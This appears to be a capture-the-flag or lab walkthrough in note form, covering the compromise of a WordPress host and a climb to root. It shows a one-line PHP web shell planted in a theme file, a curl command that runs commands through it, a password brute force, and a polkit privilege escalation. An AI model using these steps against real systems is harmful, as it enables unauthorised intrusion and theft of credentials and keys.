# Port 21 (FTP) vsftpd 3.0.3 ## vuln search - `searchsploit` only has a DoS attack for ver. 3.0.3 ![[images/Pasted image 20260615195811.png]] - Google search confirms this ## null auth - `nc -nv` ![[images/Pasted image 20260615200358.png]] - `telnet` ![[images/Pasted image 20260615200728.png]] - grab files with `wget` ![[images/Pasted image 20260615200628.png]] - harness `tree` to gain visibility into transferred files ![[images/Pasted image 20260615200826.png]] - Notes: - `James` is a user with a weak password - wordpress site may user default creds or something simple - also there is an LFI on another site # Port 65000 (http) Apache httpd 2.4.41 ## Poke around - Visit page ![[images/Pasted image 20260615202813.png]] - `/wordpress` ![[images/Pasted image 20260615202803.png]] - pages follow `/wordpress/index.php/` - footer has an interesting `<script src=[...]>` wrt to `wp-emed.min.js` - this discloses wordpress version 5.4.1 ![[images/Pasted image 20260615204005.png]] - `/wordpress/index.php/meet-the-team/` has some potential users ![[images/Pasted image 20260615204138.png]] - `wpscan` ![[images/Pasted image 20260615214242.png]]![[images/Pasted image 20260615214311.png]] - `.wp-config.php.swp` > decode `vim` swap file ![[images/Pasted image 20260615214002.png]] ```bash vim -r wp-config.php.swp ``` - `ffuf` scan on wordpress ![[images/Pasted image 20260615215125.png]] - view `/wordpress/wp-content/debug.log` ![[images/Pasted image 20260616192657.png]] - potential upload locs ![[images/Pasted image 20260616192750.png]] - view `/wordpress/wp-login.php` ![[images/Pasted image 20260615215432.png]] - `wpscan` brute-force for `admin` and `james` with `rockyou-50.txt` (~9400 passwords) - nothing for `admin` ![[images/Pasted image 20260616185401.png]] - nothing for `james` ![[images/Pasted image 20260616185944.png]] - try `james` with full `rockyou.txt` - we have creds after 36 minutes ![[images/Pasted image 20260616194155.png]] ## Wordpress Dashboard as `james` - `james` is an administrator ![[images/Pasted image 20260616193321.png]] - update the 404 template for `404.php` with the below ```php system($_GET[0]); ``` ![[images/Pasted image 20260616193452.png]] - Getting an error when we click `Update File` ![[images/Pasted image 20260616193701.png]] - Some googling indicates that this error occurs for active themes, so user twentynineteen instead of twentytwenty - that worked for `header.php` but not `404.php` ![[images/Pasted image 20260616200234.png]] - test with `curl` ```bash curl http://10.10.110.100:65000/wordpress/wp-content/themes/twentynineteen/header.php?0=id ``` ![[images/Pasted image 20260616200317.png]] - this time add a revshell to `header.php` ![[images/Pasted image 20260616200454.png]] --- # Shell as `www-data`, then switch context to `james` - hit `header.php` with `curl` after adding the revshell ![[images/Pasted image 20260616200711.png]] - stabilize shell with `script` technique - `su - james` to switch context to `james` - we have a flag ![[images/Pasted image 20260616201527.png]] - also `.bash_history` has creds for `balthazar` - open ports check, groups, and `sudo -l` ![[images/Pasted image 20260616202232.png]] --- # Shell as `balthazar` ## minimal enum - open a separate `ssh` connection as `balthazar` ![[images/Pasted image 20260616202534.png]] - we have access to an internal network? ![[images/Pasted image 20260616202601.png]] - review `/var/www/html` ![[images/Pasted image 20260616203301.png]] - let's `scp` this `wordpress.bak` to Kali > having perms issues ![[images/Pasted image 20260616203327.png]] ## `mysql` session as `shaun` - enum mysql dbs ![[images/Pasted image 20260616204150.png]] - mysql db ![[images/Pasted image 20260616204208.png]] - user table ![[images/Pasted image 20260616204226.png]] - wordpress db ![[images/Pasted image 20260616204257.png]] - wp_users table ![[images/Pasted image 20260616204324.png]] - Try `into outfile` - check privs ![[images/Pasted image 20260616205458.png]] - come back to this later - try to crack admin hash with `hashcat -m 400` > exhausted ![[images/Pasted image 20260616212343.png]] ## run `linpeas.sh` - kernel and OS ver ![[images/Pasted image 20260616211014.png]] - old sudo ver ![[images/Pasted image 20260616211027.png]] - possible unmounted fs ![[images/Pasted image 20260616211038.png]] - exploit suggester shows multiple CVEs ![[images/Pasted image 20260616211127.png]] - FOCUS on CVE-2021-3560 ## run `lazagne.py` - having issues because we typically need to use `venv` ## abuse `polkit` re: CVE-2021-3560 - move `traitor-amd64` to target > bam! ![[images/Pasted image 20260616212750.png]] --- # Shell as `root` - we have the flag and an ssh key ![[images/Pasted image 20260616212847.png]] - move `id_rsa` for `root` to `loot` directory ![[images/Pasted image 20260616213533.png]]